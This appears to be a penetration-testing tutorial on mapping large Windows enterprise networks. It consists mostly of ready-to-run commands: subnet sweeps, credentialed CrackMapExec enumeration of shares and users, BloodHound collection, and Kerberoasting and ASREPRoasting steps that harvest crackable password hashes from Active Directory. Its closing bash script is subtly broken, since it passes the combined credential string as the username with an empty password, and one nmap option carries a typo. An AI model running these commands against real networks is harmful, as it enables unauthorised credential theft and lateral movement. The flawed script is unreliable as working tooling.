Enterprise Network Reconnaissance: Large-Scale Windows Environment Mapping
Guide to performing reconnaissance across large enterprise Windows networks including domain enumeration, Active Directory mapping, and automated tool integration.
Seeing the Whole Picture at Scale
Enterprise network reconnaissance is the systematic process of mapping large-scale Windows environments — hundreds or thousands of hosts, multiple domains, Active Directory forests, and complex trust relationships. Unlike small-scale assessments, enterprise reconnaissance demands automated tools, parallel execution, and structured data management to handle the volume of information.
Enterprise environments typically include domain controllers, file servers, workstations, printers, IoT devices, and cloud-connected services. Understanding the complete infrastructure is essential for identifying attack paths, lateral movement opportunities, and high-value targets in professional engagements.
Prerequisites
Phase 1: Network Segmentation Discovery
Enterprise networks are divided into VLANs and subnets. Map the network structure:
# Discover live hosts across multiple subnets
for subnet in 10.0.1.0/24 10.0.2.0/24 10.0.3.0/24; do
nmap -sn $subnet -oG live_$subnet.txt
done
# ARP discovery on local segments
netdiscover -r 10.0.1.0/24 -f
netdiscover -r 10.0.2.0/24 -f
Phase 2: SMB Service Identification
Scan all discovered hosts for SMB services:
# Mass SMB port scanning
nmap -p 139,445 -iL live_hosts.txt -oX smb_scan.xml
# Detect SMB versions across the network
nmap -p 445 --script smb-os-discovery -iL smb_hosts.txt -oX smb_versions.xml
# Identify domain controllers
nmap -p 389,636,88,53 -iL live_hosts.txt -oX dc_scan.xml
Phase 3: Domain Controller Identification
Domain controllers are the high-value targets:
# Find DCs via DNS
nmap -p 53 -sV 10.0.1.0/24
# LDAP enumeration to find DCs
ldapsearch -x -H ldap://10.0.1.10 -b "DC=corp,DC=local" -D "cn=admin" -w pass "(objectClass=domainController)"
# Enum4Linux against suspected DCs
enum4linux -a 10.0.1.10
Phase 4: Automated Share Enumeration
Use CrackMapExec for parallel enumeration:
# Enumerate all shares across the network
crackmapexec smb 10.0.1.0/24 -u admin -p password --shares
# Extract user lists from all hosts
crackmapexec smb 10.0.1.0/24 -u admin -p password --users > users_all.txt
# Password policy across the network
crackmapexec smb 10.0.1.0/24 -u admin -p password --pass-pol
# Find writable shares
crackmapexec smb 10.0.1.0/24 -u admin -p password --shares --writable
Phase 5: Active Directory Enumeration
Deep AD enumeration for domain environments:
# BloodHound collection
bloodhound-python -u admin -p password -d corp.local -ns 10.0.1.10 -c All
# Kerberoasting
impacket-GetUserSPNs corp.local/admin:password -dc-ip 10.0.1.10 -request
# ASREPRoasting
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.1.10 -format hashcat
# LDAP domain enumeration
ldapsearch -x -H ldap://10.0.1.10 -b "DC=corp,DC=local" -D "admin@corp.local" -w password "(objectClass=user)" sAMAccountName
Phase 6: Trust Relationship Mapping
Enterprise environments often have multiple domains with trust relationships:
# Enum4Linux domain trust information
enum4linux -a -u admin -p password 10.0.1.10 | grep -i trust
# DNS enumeration for related domains
dnsrecon -d corp.local -n 10.0.1.10
# Nmap LDAP scripts for trust discovery
nmap -p 389 --script ldap-search -script-args ldap.search.basedn="CN=System,CN=Configuration,DC=corp,DC=local" 10.0.1.10
Phase 7: Data Management
Large-scale enumeration produces massive data volumes:
# Organize output by phase
mkdir -p recon/{discovery,enumeration,ad,data}
# Save all CrackMapExec output
crackmapexec smb 10.0.1.0/24 -u admin -p password --shares | tee recon/enumeration/shares.txt
# Combine user lists
cat recon/enumeration/users_*.txt | sort -u > recon/data/all_users.txt
# Create target lists for further testing
grep "Pwn3d!" recon/enumeration/auth.txt > recon/data/computers_with_admin.txt
Automation Script
#!/bin/bash
# Enterprise SMB Recon Script
TARGET_RANGE="10.0.1.0/24"
DC_IP="10.0.1.10"
CREDS="admin:password"
echo "[*] Phase 1: Host Discovery"
nmap -sn $TARGET_RANGE -oG live_hosts.txt
echo "[*] Phase 2: SMB Scanning"
nmap -p 139,445 -iL <(grep "Up" live_hosts.txt | awk '{print $2}') -oX smb_hosts.xml
echo "[*] Phase 3: Enumeration"
crackmapexec smb $TARGET_RANGE -u $CREDS -p '' --shares > shares.txt
crackmapexec smb $TARGET_RANGE -u $CREDS -p '' --users > users.txt
crackmapexec smb $TARGET_RANGE -u $CREDS -p '' --pass-pol > pass_pol.txt
echo "[*] Complete. Review output files."
Common Challenges
Best Practices
Related Tools
Related Articles
Learning Roadmap
Summary
Enterprise network reconnaissance requires a structured, phased approach to handle the complexity and scale of large Windows environments. From initial host discovery through Active Directory enumeration and trust relationship mapping, each phase builds a more complete picture of the target infrastructure. Automation, data management, and careful operational security are essential for successful enterprise assessments.